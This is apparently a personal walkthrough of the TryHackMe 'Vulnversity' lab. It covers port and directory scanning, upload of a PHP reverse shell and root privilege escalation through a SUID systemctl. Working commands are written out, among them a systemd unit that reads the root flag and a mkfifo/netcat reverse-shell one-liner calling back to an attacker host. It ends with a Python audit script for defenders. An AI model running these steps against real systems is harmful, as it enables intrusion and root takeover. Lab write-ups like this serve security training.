TRY HACK ME

Vulnversity

Write-Ups: n0w4n

Port/Version Scan

Mine:

nmap -vv -p- -sV -A [IP]

n0w4n's:

nmap -n -T4 -sS -sV -sC -oN nmap/portscan -p- 10.10.207.138

GoBuster (dirs)

Brute-force directories & files, DNS subdomains, and virtual host names.

    apt-get install gobuster
    wordlists under /usr/share/wordlists
    Syntax: gobuster dir -u http://<ip>:3333 -w <word list location>
    -e                Print the full URLs in your console
    -u                The target URL
    -w                Path to your wordlist
    -U and -P         Username and Password for Basic Auth
    -p <x>            Proxy to use for requests
    -c <http cookies> Specify a cookie for simulating your auth

n0w4n: Used DirSearch

dirsearch -u http://10.10.207.138:3333 -e php -x 400,404

Burp: Intruder

Burp Suite Intruder: Fuzz the /internal/ directory to see what kinds of file extensions it will allow you to upload.

n0w4n: Load the wordlist and don’t forget to disable the encode options. If you forget this, you will not have the proper result as your filename will be file%2ephp, which won’t work.

Reverse Shell

Obtain a reverse shell to upload (pentestmonkey's), then start a listener on the attacking machine:

nc -lvnp 1234

# -l listener
# -v verbose
# -n numeric-only IPs, no DNS
# -p port (local port number)

Browse to the uploaded file to trigger the connection back:

http://[IP]:3333/internal/uploads/

Privilege Escalation

n0w4n: For a lot of CTFs, a good find is files with the SUID bit set.

find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null

# -perm /4000 match any file with the SUID bit set
# -type f regular files only
# 2>/dev/null hide permission-denied noise
# -l long listing format
# -d list directory names, not contents

Or use PEASS: Privilege Escalation Awesome Scripts Suite.

Discovered Vulnerability: systemctl is SUID root

Exploit

n0w4n: He said we did not have permission to write to the default systemd unit directory, so he wrote the unit file to a mktemp path under /tmp, kept in an ENVIRONMENT VARIABLE, and linked it in with systemctl.

eop=$(mktemp).service        # absolute path under /tmp; systemctl link needs a full path
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > "$eop"
/bin/systemctl link "$eop"
# Created symlink from /etc/systemd/system/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.

/bin/systemctl enable --now "$eop"
# Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.
ls -lah /tmp                 # /tmp/output now holds the flag, written by the root-run service

Alternative Exploit

To get a reverse root shell:

NOTE: the target machine ships the OpenBSD netcat, NOT the traditional netcat, so the -e (execute) flag will not work. See Netcat (Traditional) vs Netcat (OpenBSD): the OpenBSD version removed the -e flag for security reasons, hence the mkfifo form below.

# nc (openbsd): reverse-shell one-liner without -e; used inside the unit below
rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f

# Set the listener address first. An unquoted heredoc lets $HOST/$PORT expand into
# the file; inside single quotes they would stay literal and systemd would not expand them.
HOST='[IP]'; PORT=7777
cat > /tmp/gk.service <<EOF
[Service]
Type=oneshot
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f"
[Install]
WantedBy=multi-user.target
EOF

nc -lvnp 7777                               # on the attacking machine, before enabling
/bin/systemctl link /tmp/gk.service         # need the full path
/bin/systemctl enable --now /tmp/gk.service
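Defender-side check for the two findings above: a SUID-root systemctl (or similar binary) and unit symlinks that `systemctl link` drops into /etc/systemd/system pointing at /tmp. This is an added example written for these notes, not code from n0w4n's write-up or from PEASS; the risky-binary list and the writable-directory list are my own assumptions.

```python
import os
import stat
# Binaries that should never be SUID on a hardened host (my own list, not from
# the write-up); systemctl is the one this box had set SUID root.
RISKY_SUID = {"systemctl", "bash", "sh", "dash", "find", "vim", "vi", "python",
              "python3", "perl", "env", "cp", "mv", "nmap", "less", "more"}
# Directories any local user can write to: a unit file living here is attacker
# controlled even though systemd treats it as installed once linked.
WORLD_WRITABLE = ("/tmp", "/var/tmp", "/dev/shm")

def suid_is_risky(path, mode, uid):
    """True if a file is SUID root and its name is on the risky list."""
    return bool(mode & stat.S_ISUID) and uid == 0 and os.path.basename(path) in RISKY_SUID

def unit_target_is_risky(target):
    """True if a unit path (or a symlink's target) normalises into a writable dir."""
    norm = os.path.normpath(target)
    return any(norm == d or norm.startswith(d + "/") for d in WORLD_WRITABLE)

def audit_suid(root="/"):
    """Walk the tree like the find command above; return risky SUID-root files."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and suid_is_risky(path, st.st_mode, st.st_uid):
                hits.append(path)
    return hits

def audit_units(unit_dir="/etc/systemd/system"):
    """Return (link, target) pairs for unit symlinks pointing into /tmp and co."""
    hits = []
    for dirpath, _dirs, files in os.walk(unit_dir):
        for name in files:
            link = os.path.join(dirpath, name)
            if os.path.islink(link):
                target = os.path.join(dirpath, os.readlink(link))  # handles relative links
                if unit_target_is_risky(target):
                    hits.append((link, target))
    return hits

if __name__ == "__main__":
    print("risky SUID:", audit_suid())
    print("risky unit links:", audit_units())
```

Run it as root on the host to cover the whole tree; on this box it would flag /bin/systemctl and the tmp.*.service symlinks created above.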

Done.